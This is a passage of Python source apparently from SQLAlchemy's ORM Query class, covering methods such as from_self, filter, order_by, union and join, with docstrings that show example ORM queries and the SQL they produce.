query to return the ``Address.email`` column::
q = session.query(User).filter(User.name.like('e%')).\
limit(5).from_self(Address.email).\
join(User.addresses).filter(Address.email.like('q%'))
yielding:
.. sourcecode:: sql
SELECT address.email AS address_email
FROM (SELECT "user".id AS user_id, "user".name AS user_name
FROM "user"
WHERE "user".name LIKE :name_1
LIMIT :param_1) AS anon_1
JOIN address ON anon_1.user_id = address.user_id
WHERE address.email LIKE :email_1
**Looking out for Inner / Outer Columns**
Keep in mind that when referring to columns that originate from
inside the subquery, we need to ensure they are present in the
columns clause of the subquery itself; this is an ordinary aspect of
SQL. For example, if we wanted to load from a joined entity inside
the subquery using :func:`.contains_eager`, we need to add those
columns. Below illustrates a join of ``Address`` to ``User``,
then a subquery, and then we'd like :func:`.contains_eager` to access
the ``User`` columns::
q = session.query(Address).join(Address.user).\
filter(User.name.like('e%'))
q = q.add_entity(User).from_self().\
options(contains_eager(Address.user))
We use :meth:`.Query.add_entity` above **before** we call
:meth:`.Query.from_self` so that the ``User`` columns are present
in the inner subquery, so that they are available to the
:func:`.contains_eager` modifier we are using on the outside,
producing:
.. sourcecode:: sql
SELECT anon_1.address_id AS anon_1_address_id,
anon_1.address_email AS anon_1_address_email,
anon_1.address_user_id AS anon_1_address_user_id,
anon_1.user_id AS anon_1_user_id,
anon_1.user_name AS anon_1_user_name
FROM (
SELECT address.id AS address_id,
address.email AS address_email,
address.user_id AS address_user_id,
"user".id AS user_id,
"user".name AS user_name
FROM address JOIN "user" ON "user".id = address.user_id
WHERE "user".name LIKE :name_1) AS anon_1
If we didn't call ``add_entity(User)``, but still asked
:func:`.contains_eager` to load the ``User`` entity, it would be
forced to add the table on the outside without the correct
join criteria - note the ``anon1, "user"`` phrase at
the end:
.. sourcecode:: sql
-- incorrect query
SELECT anon_1.address_id AS anon_1_address_id,
anon_1.address_email AS anon_1_address_email,
anon_1.address_user_id AS anon_1_address_user_id,
"user".id AS user_id,
"user".name AS user_name
FROM (
SELECT address.id AS address_id,
address.email AS address_email,
address.user_id AS address_user_id
FROM address JOIN "user" ON "user".id = address.user_id
WHERE "user".name LIKE :name_1) AS anon_1, "user"
:param \*entities: optional list of entities which will replace
those being selected.
"""
fromclause = self.with_labels().enable_eagerloads(False).\
statement.correlate(None)
q = self._from_selectable(fromclause)
q._enable_single_crit = False
q._select_from_entity = self._entity_zero()
if entities:
q._set_entities(entities)
return q
@_generative()
def _set_enable_single_crit(self, val):
self._enable_single_crit = val
@_generative()
def _from_selectable(self, fromclause):
for attr in (
'_statement', '_criterion',
'_order_by', '_group_by',
'_limit', '_offset',
'_joinpath', '_joinpoint',
'_distinct', '_having',
'_prefixes', '_suffixes'
):
self.__dict__.pop(attr, None)
self._set_select_from([fromclause], True)
# this enables clause adaptation for non-ORM
# expressions.
self._orm_only_from_obj_alias = False
old_entities = self._entities
self._entities = []
for e in old_entities:
e.adapt_to_selectable(self, self._from_obj[0])
def values(self, *columns):
"""Return an iterator yielding result tuples corresponding
to the given list of columns"""
if not columns:
return iter(())
q = self._clone()
q._set_entities(columns, entity_wrapper=_ColumnEntity)
if not q._yield_per:
q._yield_per = 10
return iter(q)
_values = values
def value(self, column):
"""Return a scalar result corresponding to the given
column expression."""
try:
return next(self.values(column))[0]
except StopIteration:
return None
@_generative()
def with_entities(self, *entities):
r"""Return a new :class:`.Query` replacing the SELECT list with the
given entities.
e.g.::
# Users, filtered on some arbitrary criterion
# and then ordered by related email address
q = session.query(User).\
join(User.address).\
filter(User.name.like('%ed%')).\
order_by(Address.email)
# given *only* User.id==5, Address.email, and 'q', what
# would the *next* User in the result be ?
subq = q.with_entities(Address.email).\
order_by(None).\
filter(User.id==5).\
subquery()
q = q.join((subq, subq.c.email < Address.email)).\
limit(1)
.. versionadded:: 0.6.5
"""
self._set_entities(entities)
@_generative()
def add_columns(self, *column):
"""Add one or more column expressions to the list
of result columns to be returned."""
self._entities = list(self._entities)
l = len(self._entities)
for c in column:
_ColumnEntity(self, c)
# _ColumnEntity may add many entities if the
# given arg is a FROM clause
self._set_entity_selectables(self._entities[l:])
@util.pending_deprecation("0.7",
":meth:`.add_column` is superseded "
"by :meth:`.add_columns`",
False)
def add_column(self, column):
"""Add a column expression to the list of result columns to be
returned.
Pending deprecation: :meth:`.add_column` will be superseded by
:meth:`.add_columns`.
"""
return self.add_columns(column)
def options(self, *args):
"""Return a new Query object, applying the given list of
mapper options.
Most supplied options regard changing how column- and
relationship-mapped attributes are loaded. See the sections
:ref:`deferred` and :doc:`/orm/loading_relationships` for reference
documentation.
"""
return self._options(False, *args)
def _conditional_options(self, *args):
return self._options(True, *args)
@_generative()
def _options(self, conditional, *args):
# most MapperOptions write to the '_attributes' dictionary,
# so copy that as well
self._attributes = self._attributes.copy()
if '_unbound_load_dedupes' not in self._attributes:
self._attributes['_unbound_load_dedupes'] = set()
opts = tuple(util.flatten_iterator(args))
self._with_options = self._with_options + opts
if conditional:
for opt in opts:
opt.process_query_conditionally(self)
else:
for opt in opts:
opt.process_query(self)
def with_transformation(self, fn):
"""Return a new :class:`.Query` object transformed by
the given function.
E.g.::
def filter_something(criterion):
def transform(q):
return q.filter(criterion)
return transform
q = q.with_transformation(filter_something(x==5))
This allows ad-hoc recipes to be created for :class:`.Query`
objects. See the example at :ref:`hybrid_transformers`.
.. versionadded:: 0.7.4
"""
return fn(self)
@_generative()
def with_hint(self, selectable, text, dialect_name='*'):
"""Add an indexing or other executional context
hint for the given entity or selectable to
this :class:`.Query`.
Functionality is passed straight through to
:meth:`~sqlalchemy.sql.expression.Select.with_hint`,
with the addition that ``selectable`` can be a
:class:`.Table`, :class:`.Alias`, or ORM entity / mapped class
/etc.
.. seealso::
:meth:`.Query.with_statement_hint`
"""
if selectable is not None:
selectable = inspect(selectable).selectable
self._with_hints += ((selectable, text, dialect_name),)
def with_statement_hint(self, text, dialect_name='*'):
"""add a statement hint to this :class:`.Select`.
This method is similar to :meth:`.Select.with_hint` except that
it does not require an individual table, and instead applies to the
statement as a whole.
This feature calls down into :meth:`.Select.with_statement_hint`.
.. versionadded:: 1.0.0
.. seealso::
:meth:`.Query.with_hint`
"""
return self.with_hint(None, text, dialect_name)
@_generative()
def execution_options(self, **kwargs):
""" Set non-SQL options which take effect during execution.
The options are the same as those accepted by
:meth:`.Connection.execution_options`.
Note that the ``stream_results`` execution option is enabled
automatically if the :meth:`~sqlalchemy.orm.query.Query.yield_per()`
method is used.
"""
self._execution_options = self._execution_options.union(kwargs)
@_generative()
def with_lockmode(self, mode):
"""Return a new :class:`.Query` object with the specified "locking mode",
which essentially refers to the ``FOR UPDATE`` clause.
.. deprecated:: 0.9.0 superseded by :meth:`.Query.with_for_update`.
:param mode: a string representing the desired locking mode.
Valid values are:
* ``None`` - translates to no lockmode
* ``'update'`` - translates to ``FOR UPDATE``
(standard SQL, supported by most dialects)
* ``'update_nowait'`` - translates to ``FOR UPDATE NOWAIT``
(supported by Oracle, PostgreSQL 8.1 upwards)
* ``'read'`` - translates to ``LOCK IN SHARE MODE`` (for MySQL),
and ``FOR SHARE`` (for PostgreSQL)
.. seealso::
:meth:`.Query.with_for_update` - improved API for
specifying the ``FOR UPDATE`` clause.
"""
self._for_update_arg = LockmodeArg.parse_legacy_query(mode)
@_generative()
def with_for_update(self, read=False, nowait=False, of=None,
skip_locked=False, key_share=False):
"""return a new :class:`.Query` with the specified options for the
``FOR UPDATE`` clause.
The behavior of this method is identical to that of
:meth:`.SelectBase.with_for_update`. When called with no arguments,
the resulting ``SELECT`` statement will have a ``FOR UPDATE`` clause
appended. When additional arguments are specified, backend-specific
options such as ``FOR UPDATE NOWAIT`` or ``LOCK IN SHARE MODE``
can take effect.
E.g.::
q = sess.query(User).with_for_update(nowait=True, of=User)
The above query on a PostgreSQL backend will render like::
SELECT users.id AS users_id FROM users FOR UPDATE OF users NOWAIT
.. versionadded:: 0.9.0 :meth:`.Query.with_for_update` supersedes
the :meth:`.Query.with_lockmode` method.
.. seealso::
:meth:`.GenerativeSelect.with_for_update` - Core level method with
full argument and behavioral description.
"""
self._for_update_arg = LockmodeArg(read=read, nowait=nowait, of=of,
skip_locked=skip_locked,
key_share=key_share)
@_generative()
def params(self, *args, **kwargs):
r"""add values for bind parameters which may have been
specified in filter().
parameters may be specified using \**kwargs, or optionally a single
dictionary as the first positional argument. The reason for both is
that \**kwargs is convenient, however some parameter dictionaries
contain unicode keys in which case \**kwargs cannot be used.
"""
if len(args) == 1:
kwargs.update(args[0])
elif len(args) > 0:
raise sa_exc.ArgumentError(
"params() takes zero or one positional argument, "
"which is a dictionary.")
self._params = self._params.copy()
self._params.update(kwargs)
@_generative(_no_statement_condition, _no_limit_offset)
def filter(self, *criterion):
r"""apply the given filtering criterion to a copy
of this :class:`.Query`, using SQL expressions.
e.g.::
session.query(MyClass).filter(MyClass.name == 'some name')
Multiple criteria may be specified as comma separated; the effect
is that they will be joined together using the :func:`.and_`
function::
session.query(MyClass).\
filter(MyClass.name == 'some name', MyClass.id > 5)
The criterion is any SQL expression object applicable to the
WHERE clause of a select. String expressions are coerced
into SQL expression constructs via the :func:`.text` construct.
.. seealso::
:meth:`.Query.filter_by` - filter on keyword expressions.
"""
for criterion in list(criterion):
criterion = expression._expression_literal_as_text(criterion)
criterion = self._adapt_clause(criterion, True, True)
if self._criterion is not None:
self._criterion = self._criterion & criterion
else:
self._criterion = criterion
def filter_by(self, **kwargs):
r"""apply the given filtering criterion to a copy
of this :class:`.Query`, using keyword expressions.
e.g.::
session.query(MyClass).filter_by(name = 'some name')
Multiple criteria may be specified as comma separated; the effect
is that they will be joined together using the :func:`.and_`
function::
session.query(MyClass).\
filter_by(name = 'some name', id = 5)
The keyword expressions are extracted from the primary
entity of the query, or the last entity that was the
target of a call to :meth:`.Query.join`.
.. seealso::
:meth:`.Query.filter` - filter on SQL expressions.
"""
clauses = [_entity_descriptor(self._joinpoint_zero(), key) == value
for key, value in kwargs.items()]
return self.filter(sql.and_(*clauses))
@_generative(_no_statement_condition, _no_limit_offset)
def order_by(self, *criterion):
"""apply one or more ORDER BY criterion to the query and return
the newly resulting ``Query``
All existing ORDER BY settings can be suppressed by
passing ``None`` - this will suppress any ORDER BY configured
on mappers as well.
Alternatively, passing False will reset ORDER BY and additionally
re-allow default mapper.order_by to take place. Note mapper.order_by
is deprecated.
"""
if len(criterion) == 1:
if criterion[0] is False:
if '_order_by' in self.__dict__:
self._order_by = False
return
if criterion[0] is None:
self._order_by = None
return
criterion = self._adapt_col_list(criterion)
if self._order_by is False or self._order_by is None:
self._order_by = criterion
else:
self._order_by = self._order_by + criterion
@_generative(_no_statement_condition, _no_limit_offset)
def group_by(self, *criterion):
"""apply one or more GROUP BY criterion to the query and return
the newly resulting :class:`.Query`
All existing GROUP BY settings can be suppressed by
passing ``None`` - this will suppress any GROUP BY configured
on mappers as well.
.. versionadded:: 1.1 GROUP BY can be cancelled by passing None,
in the same way as ORDER BY.
"""
if len(criterion) == 1:
if criterion[0] is None:
self._group_by = False
return
criterion = list(chain(*[_orm_columns(c) for c in criterion]))
criterion = self._adapt_col_list(criterion)
if self._group_by is False:
self._group_by = criterion
else:
self._group_by = self._group_by + criterion
@_generative(_no_statement_condition, _no_limit_offset)
def having(self, criterion):
r"""apply a HAVING criterion to the query and return the
newly resulting :class:`.Query`.
:meth:`~.Query.having` is used in conjunction with
:meth:`~.Query.group_by`.
HAVING criterion makes it possible to use filters on aggregate
functions like COUNT, SUM, AVG, MAX, and MIN, eg.::
q = session.query(User.id).\
join(User.addresses).\
group_by(User.id).\
having(func.count(Address.id) > 2)
"""
criterion = expression._expression_literal_as_text(criterion)
if criterion is not None and \
not isinstance(criterion, sql.ClauseElement):
raise sa_exc.ArgumentError(
"having() argument must be of type "
"sqlalchemy.sql.ClauseElement or string")
criterion = self._adapt_clause(criterion, True, True)
if self._having is not None:
self._having = self._having & criterion
else:
self._having = criterion
def _set_op(self, expr_fn, *q):
return self._from_selectable(
expr_fn(*([self] + list(q)))
)._set_enable_single_crit(False)
def union(self, *q):
"""Produce a UNION of this Query against one or more queries.
e.g.::
q1 = sess.query(SomeClass).filter(SomeClass.foo=='bar')
q2 = sess.query(SomeClass).filter(SomeClass.bar=='foo')
q3 = q1.union(q2)
The method accepts multiple Query objects so as to control
the level of nesting. A series of ``union()`` calls such as::
x.union(y).union(z).all()
will nest on each ``union()``, and produces::
SELECT * FROM (SELECT * FROM (SELECT * FROM X UNION
SELECT * FROM y) UNION SELECT * FROM Z)
Whereas::
x.union(y, z).all()
produces::
SELECT * FROM (SELECT * FROM X UNION SELECT * FROM y UNION
SELECT * FROM Z)
Note that many database backends do not allow ORDER BY to
be rendered on a query called within UNION, EXCEPT, etc.
To disable all ORDER BY clauses including those configured
on mappers, issue ``query.order_by(None)`` - the resulting
:class:`.Query` object will not render ORDER BY within
its SELECT statement.
"""
return self._set_op(expression.union, *q)
def union_all(self, *q):
"""Produce a UNION ALL of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.union_all, *q)
def intersect(self, *q):
"""Produce an INTERSECT of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.intersect, *q)
def intersect_all(self, *q):
"""Produce an INTERSECT ALL of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.intersect_all, *q)
def except_(self, *q):
"""Produce an EXCEPT of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.except_, *q)
def except_all(self, *q):
"""Produce an EXCEPT ALL of this Query against one or more queries.
Works the same way as :meth:`~sqlalchemy.orm.query.Query.union`. See
that method for usage examples.
"""
return self._set_op(expression.except_all, *q)
def join(self, *props, **kwargs):
r"""Create a SQL JOIN against this :class:`.Query` object's criterion
and apply generatively, returning the newly resulting :class:`.Query`.
**Simple Relationship Joins**
Consider a mapping between two classes ``User`` and ``Address``,
with a relationship ``User.addresses`` representing a collection
of ``Address`` objects associated with each ``User``. The most
common usage of :meth:`~.Query.join` is to create a JOIN along this
relationship, using the ``User.addresses`` attribute as an indicator
for how this should occur::
q = session.query(User).join(User.addresses)
Where above, the call to :meth:`~.Query.join` along ``User.addresses``
will result in SQL equivalent to::
SELECT user.* FROM user JOIN address ON user.id = address.user_id
In the above example we refer to ``User.addresses`` as passed to
:meth:`~.Query.join` as the *on clause*, that is, it indicates
how the "ON" portion of the JOIN should be constructed. For a
single-entity query such as the one above (i.e. we start by selecting
only from ``User`` and nothing else), the relationship can also be
specified by its string name::
q = session.query(User).join("addresses")
:meth:`~.Query.join` can also accommodate multiple
"on clause" arguments to produce a chain of joins, such as below
where a join across four related entities is constructed::
q = session.query(User).join("orders", "items", "keywords")
The above would be shorthand for three separate calls to
:meth:`~.Query.join`, each using an explicit attribute to indicate
the source entity::
q = session.query(User).\
join(User.orders).\
join(Order.items).\
join(Item.keywords)
**Joins to a Target Entity or Selectable**
A second form of :meth:`~.Query.join` allows any mapped entity
or core selectable construct as a target. In this usage,
:meth:`~.Query.join` will attempt
to create a JOIN along the natural foreign key relationship between
two entities::
q = session.query(User).join(Address)
The above calling form of :meth:`~.Query.join` will raise an error if
either there are no foreign keys between the two entities, or if
there are multiple foreign key linkages between them. In the
above calling form, :meth:`~.Query.join` is called upon to
create the "on clause" automatically for us. The target can
be any mapped entity or selectable, such as a :class:`.Table`::
q = session.query(User).join(addresses_table)
**Joins to a Target with an ON Clause**
The third calling form allows both the target entity as well
as the ON clause to be passed explicitly. Suppose for
example we wanted to join to ``Address`` twice, using
an alias the second time. We use :func:`~sqlalchemy.orm.aliased`
to create a distinct alias of ``Address``, and join
to it using the ``target, onclause`` form, so that the
alias can be specified explicitly as the target along with
the relationship to instruct how the ON clause should proceed::
a_alias = aliased(Address)
q = session.query(User).\
join(User.addresses).\
join(a_alias, User.addresses).\
filter(Address.email_address=='ed@foo.com').\
filter(a_alias.email_address=='ed@bar.com')
Where above, the generated SQL would be similar to::
SELECT user.* FROM user
JOIN address ON user.id = address.user_id
JOIN address AS address_1 ON user.id=address_1.user_id
WHERE address.email_address = :email_address_1
AND address_1.email_address = :email_address_2
The two-argument calling form of :meth:`~.Query.join`
also allows us to construct arbitrary joins with SQL-oriented
"on clause" expressions, not relying upon configured relationships
at all. Any SQL expression can be passed as the ON clause
when using the two-argument form, which should refer to the target
entity in some way as well as an applicable source entity::
q = session.query(User).join(Address, User.id==Address.user_id)
.. versionchanged:: 0.7
In SQLAlchemy 0.6 and earlier, the two argument form of
:meth:`~.Query.join` requires the usage of a tuple:
``query(User).join((Address, User.id==Address.user_id))``\ .
This calling form is accepted in 0.7 and further, though
is not necessary unless multiple join conditions are passed to
a single :meth:`~.Query.join` call, which itself is also not
generally necessary as it is now equivalent to multiple
calls (this wasn't always the case).
**Advanced Join Targeting and Adaption**
There is a lot of flexibility in what the "target" can be when using
:meth:`~.Query.join`. As noted previously, it also accepts
:class:`.Table` constructs and other selectables such as
:func:`.alias` and :func:`.select` constructs, with either the one
or two-argument forms::
addresses_q = select([Address.user_id]).\
where(Address.email_address.endswith("@bar.com")).\
alias()
q = session.query(User).\
join(addresses_q, addresses_q.c.user_id==User.id)
:meth:`~.Query.join` also features the ability to *adapt* a
:meth:`~sqlalchemy.orm.relationship` -driven ON clause to the target
selectable. Below we construct a JOIN from ``User`` to a subquery
against ``Address``, allowing the relationship denoted by
``User.addresses`` to *adapt* itself to the altered target::
address_subq = session.query(Address).\
filter(Address.email_address == 'ed@foo.com').\
subquery()
q = session.query(User).join(address_subq, User.addresses)
Producing SQL similar to::
SELECT user.* FROM user
JOIN (
SELECT address.id AS id,
address.user_id AS user_id,
address.email_address AS email_address
FROM address
WHERE address.email_address = :email_address_1
) AS anon_1 ON user.id = anon_1.user_id
The above form allows one to fall back onto an explicit ON
clause at any time::
q = session.query(User).\
join(address_subq, User.id==address_subq.c.user_id)
**Controlling what to Join From**
While :meth:`~.Query.join` exclusively deals with the "right"
side of the JOIN, we can also control the "left" side, in those
cases where it's needed, using :meth:`~.Query.select_from`.
Below we construct a query against ``Address`` but can still
make usage of ``User.addresses`` as our ON clause by instructing
the :class:`.Query` to select first from the ``User``
entity::
q = session.query(Address).select_from(User).\
join(User.addresses).\
filter(User.name == 'ed')
Which will produce SQL similar to::
SELECT address.* FROM user
JOIN address ON user.id=address.user_id
WHERE user.name = :name_1
**Constructing Aliases Anonymously**
:meth:`~.Query.join` can construct anonymous aliases
using the ``aliased=True`` flag. This feature is useful
when a query is being joined algorithmically, such as
when querying self-referentially to an arbitrary depth::
q = session.query(Node).\
join("children", "children", aliased=True)
When ``aliased=True`` is used, the actual "alias" construct
is not explicitly available. To work with it, methods such as
:meth:`.Query.filter` will adapt the incoming entity to
the last join point::
q = session.query(Node).\
join("children", "children", aliased=True).\
filter(Node.name == 'grandchild 1')
When using automatic aliasing, the ``from_joinpoint=True``
argument can allow a multi-node join to be broken into
multiple calls to :meth:`~.Query.join`, so that
each path along the way can be further filtered::
q = session.query(Node).\
join("children", aliased=True).\
filter(Node.name='child 1').\
join("children", aliased=True, from_joinpoint=True).\
filter(Node.name == 'grandchild 1')
The filtering aliases above can then be reset back to the
original ``Node`` entity using :meth:`~.Query.reset_joinpoint`::
q = session.query(Node).\
join("children", "children", aliased=True).\
filter(Node.name == 'grandchild 1').\
reset_joinpoint().\
filter(Node.name == 'parent 1)
For an example of ``aliased=True``, see the distribution
example :ref:`examples_xmlpersistence` which illustrates
an XPath-like query system using algorithmic joins.
:param \*props: A collection of one or more join conditions,
each consisting of a relationship-bound attribute or string
relationship name representing an "on clause", or a single
target entity, or a tuple in the form of ``(target, onclause)``.
A special two-argument calling form of the form ``target, onclause``
is also accepted.
:param aliased=False: If True, indicate that the JOIN target should be
anonymously aliased. Subsequent calls to :meth:`~.Query.filter`
and similar will adapt the incoming criterion to the target
alias, until :meth:`~.Query.reset_joinpoint` is called.
:param isouter=False: If True, the join used will be a left outer join,
just as if the :meth:`.Query.outerjoin` method were called. This
flag is here to maintain consistency with the same flag as accepted
by :meth:`.FromClause.join` and other Core constructs.
.. versionadded:: 1.0.0
:param full=False: render FULL OUTER JOIN; implies ``isouter``.
.. versionadded:: 1.1
:param from_joinpoint=False: When using ``aliased=True``, a setting
of True here will cause the join to be from the most recent
joined target, rather than starting back from the original
FROM clauses of the query.
.. seealso::
:ref:`ormtutorial_joins` in the ORM tutorial.
:ref:`inheritance_toplevel` for details on how
:meth:`~.Query.join` is used for inheritance relationships.
:func:`.orm.join` - a standalone ORM-level join function,
used internally by :meth:`.Query.join`, which in previous
SQLAlchemy versions was the primary ORM-level joining interface.
"""
aliased, from_joinpoint, isouter, full = kwargs.pop('aliased', False),\
kwargs.pop('from_joinpoint', False),\
kwargs.pop('isouter', False),\
kwargs.pop('full', False)
if kwargs:
raise TypeError("unknown arguments: %s" %
', '.join(sorted(kwargs)))
return self._join(props,
outerjoin=isouter, full=full,
create_aliases=aliased,
from_joinpoint=from_joinpoint)
def outerjoin(self, *props, **kwargs):
"""Create a left outer join against this ``Query`` object's criterion
and apply generatively, returning the newly resulting ``Query``.
Usage is the same as the ``join()`` method.
"""
aliased, from_joinpoint, full = kwargs.pop('aliased', False), \
kwargs.pop('from_joinpoint', False), \
kwargs.pop('full', False)
if kwargs:
raise TypeError("unknown arguments: %s" %
', '.join(sorted(kwargs)))
return self._join(props,
outerjoin=True, full=full, create_aliases=aliased,
from_joinpoint=from_joinpoint)
def _update_joinpoint(self, jp):
self._joinpoint = jp
# copy backwards to the root of the _joinpath
# dict, so that no existing dict in the path is mutated
while 'prev' in jp:
f, prev = jp['prev']
prev = prev.copy()
prev[f] = jp
jp['prev'] = (f, prev)
jp = prev
self._joinpath = jp
@_generative(_no_statement_condition, _no_limit_offset)
def _join(self, keys, outerjoin, full, create_aliases, from_joinpoint):
"""consumes arguments from join() or outerjoin(), places them into a
consistent format with which to form the actual JOIN constructs.
"""
if not from_joinpoint:
self._reset_joinpoint()
if len(keys) == 2 and \
isinstance(keys[0], (expression.FromClause,
type, AliasedClass)) and \
isinstance(keys[1], (str, expression.ClauseElement,
interfaces.PropComparator)):
# detect 2-arg form of join and
# convert to a tuple.
keys = (keys,)
keylist = util.to_list(keys)
for idx, arg1 in enumerate(keylist):
if isinstance(arg1, tuple):
# "tuple" form of join, multiple
# tuples are accepted as well. The simpler
# "2-arg" form is preferred. May deprecate
# the "tuple" usage.
arg1, arg2 = arg1
else:
arg2 = None
# determine onclause/right_entity. there
# is a little bit of legacy behavior still at work here
# which means they might be in either order. may possibly
# lock this down to (right_entity, onclause) in 0.6.
if isinstance(
arg1, (interfaces.PropComparator, util.string_types)):
right_entity, onclause = arg2, arg1
else:
right_entity, onclause = arg1, arg2
left_entity = prop = None
if isinstance(onclause, interfaces.PropComparator):
of_type = getattr(onclause, '_of_type', None)
else:
of_type = None
if isinstance(onclause, util.string_types):
left_entity = self._joinpoint_zero()
descriptor = _entity_descriptor(left_entity, onclause)
onclause = descriptor
# check for q.join(Class.propname, from_joinpoint=True)
# and Class is that of the current joinpoint
elif from_joinpoint and \
isinstance(onclause, interfaces.PropComparator):
left_entity = onclause._parententity
info = inspect(self._joinpoint_zero())
left_mapper, left_selectable, left_is_aliased = \
getattr(info, 'mapper', None), \
info.selectable, \
getattr(info, 'is_aliased_class', None)
if left_mapper is left_entity:
left_entity = self._joinpoint_zero()
descriptor = _entity_descriptor(left_entity,
onclause.key)
onclause = descriptor
if isinstance(onclause, interfaces.PropComparator):
if right_entity is None:
if of_type:
right_entity = of_type
else:
right_entity = onclause.property.mapper
left_entity = onclause._parententity
alias = self._polymorphic_adapters.get(left_entity, None)
# could be None or could be ColumnAdapter also
if isinstance(alias, ORMAdapter) and \
alias.mapper.isa(left_entity):
left_entity = alias.aliased_class
onclause = getattr(left_entity, onclause.key)
prop = onclause.property
if not isinstance(onclause, attributes.QueryableAttribute):
onclause = prop
if not create_aliases:
# check for this path already present.
# don't render in that case.
edge = (left_entity, right_entity, prop.key)
if edge in self._joinpoint:
# The child's prev reference might be stale --
# it could point to a parent older than the
# current joinpoint. If this is the case,
# then we need to update it and then fix the
# tree's spine with _update_joinpoint. Copy
# and then mutate the child, which might be
# shared by a different query object.
jp = self._joinpoint[edge].copy()
jp['prev'] = (edge, self._joinpoint)
self._update_joinpoint(jp)
if idx == len(keylist) - 1:
util.warn(
"Pathed join target %s has already "
"been joined to; skipping" % prop)
continue
elif onclause is not None and right_entity is None:
# TODO: no coverage here
raise NotImplementedError("query.join(a==b) not supported.")
self._join_left_to_right(
left_entity,
right_entity, onclause,
outerjoin, full, create_aliases, prop)
def _join_left_to_right(self, left, right,
onclause, outerjoin, full, create_aliases, prop):
"""append a JOIN to the query's from clause."""
self._polymorphic_adapters = self._polymorphic_adapters.copy()
if left is None:
if self._from_obj:
left = self._from_obj[0]
elif self._entities:
left = self._entities[0].entity_zero_or_selectable
if left is None:
if self._entities:
problem = "Don't know how to join from %s" % self._entities[0]
else:
problem = "No entities to join from"
raise sa_exc.InvalidRequestError(
"%s; please use "
"select_from() to establish the left "
"entity/selectable of this join" % problem)
if left is right and \
not create_aliases:
raise sa_exc.InvalidRequestError(
"Can't construct a join from %s to %s, they "
"are the same entity" %
(left, right))
l_info = inspect(left)
r_info = inspect(right)
overlap = False
if not create_aliases:
right_mapper = getattr(r_info, "mapper", None)
# if the target is a joined inheritance mapping,
# be more liberal about auto-aliasing.
if right_mapper and (
right_mapper.with_polymorphic or
isinstance(right_mapper.mapped_table, expression.Join)
):
for from_obj in self._from_obj or [l_info.selectable]:
if sql_util.selectables_overlap(
l_info.selectable, from_obj) and \
sql_util.selectables_overlap(
from_obj, r_info.selectable):
overlap = True
break
if (overlap or not create_aliases) and \
l_info.selectable is r_info.selectable:
raise sa_exc.InvalidRequestError(
"Can't join table/selectable '%s' to itself" %
l_info.selectable)
right, onclause = self._prepare_right_side(
r_info, right, onclause,
create_aliases,
prop, overlap)
# if joining on a MapperProperty path,
# track the path to prevent redundant joins
if not create_aliases and prop:
self._update_joinpoint({
'_joinpoint_entity': right,
'prev': ((left, right, prop.key), self._joinpoint)
})
else:
self._joinpoint = {'_joinpoint_entity': right}
self._join_to_left(l_info, left, right, onclause, outerjoin, full)
def _prepare_right_side(self, r_info, right, onclause, create_aliases,
prop, overlap):
info = r_info
right_mapper, right_selectable, right_is_aliased = \
getattr(info, 'mapper', None), \
info.selectable, \
getattr(info, 'is_aliased_class', False)
if right_mapper:
self._join_entities += (info, )
if right_mapper and prop and \
not right_mapper.common_parent(prop.mapper):
raise sa_exc.InvalidRequestError(
"Join target %s does not correspond to "
"the right side of join condition %s" % (right, onclause)
)
if not right_mapper and prop:
right_mapper = prop.mapper
need_adapter = False
if r_info.is_clause_element and right_selectable._is_lateral:
# orm_only is disabled to suit the case where we have to
# adapt an explicit correlate(Entity) - the select() loses
# the ORM-ness in this case right now, ideally it would not
right = self._adapt_clause(right, True, False)
if right_mapper and right is right_selectable:
if not right_selectable.is_derived_from(
right_mapper.mapped_table):
raise sa_exc.InvalidRequestError(
"Selectable '%s' is not derived from '%s'" %
(right_selectable.description,
right_mapper.mapped_table.description))
if isinstance(right_selectable, expression.SelectBase):
# TODO: this isn't even covered now!
right_selectable = right_selectable.alias()
need_adapter = True
right = aliased(right_mapper, right_selectable)
aliased_entity = right_mapper and \
not right_is_aliased and \
(
right_mapper.with_polymorphic and isinstance(
right_mapper._with_polymorphic_selectable,
expression.Alias)
or
overlap # test for overlap:
# orm/inheritance/relationships.py
# SelfReferentialM2MTest
)
if not need_adapter and (create_aliases or aliased_entity):
right = aliased(right, flat=True)
need_adapter = True
# if an alias() of the right side was generated here,
# apply an adapter to all subsequent filter() calls
# until reset_joinpoint() is called.
if need_adapter:
self._filter_aliases = ORMAdapter(
right,
equivalents=right_mapper and
right_mapper._equivalent_columns or {},
chain_to=self._filter_aliases)
# if the onclause is a ClauseElement, adapt it with any
# adapters that are in place right now
if isinstance(onclause, expression.ClauseElement):
onclause = self._adapt_clause(onclause, True, True)
# if an alias() on the right side was generated,
# which is intended to wrap a the right side in a subquery,
# ensure that columns retrieved from this target in the result
# set are also adapted.
if aliased_entity and not create_aliases:
self._mapper_loads_polymorphically_with(
right_mapper,
ORMAdapter(
right,
equivalents=right_mapper._equivalent_columns
)
)
return right, onclause
def _join_to_left(self, l_info, left, right, onclause, outerjoin, full):
info = l_info
left_mapper = getattr(info, 'mapper', None)
left_selectable = info.selectable
if self._from_obj:
replace_clause_index, clause = sql_util.find_join_source(
self._from_obj,
left_selectable)
if clause is not None:
try:
clause = orm_join(clause,
right,
onclause, isouter=outerjoin, full=full)
except sa_exc.ArgumentError as ae:
raise sa_exc.InvalidRequestError(
"Could not find a FROM clause to join from. "
"Tried joining to %s, but got: %s" % (right, ae))
self._from_obj = \
self._from_obj[:replace_clause_index] + \
(clause, ) + \
self._from_obj[replace_clause_index + 1:]
return
if left_mapper:
for ent in self._entities:
if ent.corresponds_to(left):
clause = ent.selectable
break
else:
clause = left
else:
clause = left_selectable
assert clause is not None
try:
clause = orm_join(
clause, right, onclause, isouter=outerjoin, full=full)
except sa_exc.ArgumentError as ae:
raise sa_exc.InvalidRequestError(
"Could not find a FROM clause to join from. "
"Tried joining to %s, but got: %s" % (right, ae))
self._from_obj = self._from_obj + (clause,)
def _reset_joinpoint(self):
self._joinpoint = self._joinpath
self._filter_aliases = None
@_generative(_no_statement_condition)
def reset_joinpoint(self):
"""Return a new :class:`.Query`, where the "join point" has
been reset back to the base FROM entities of the query.
This method is usually used in conjunction with the
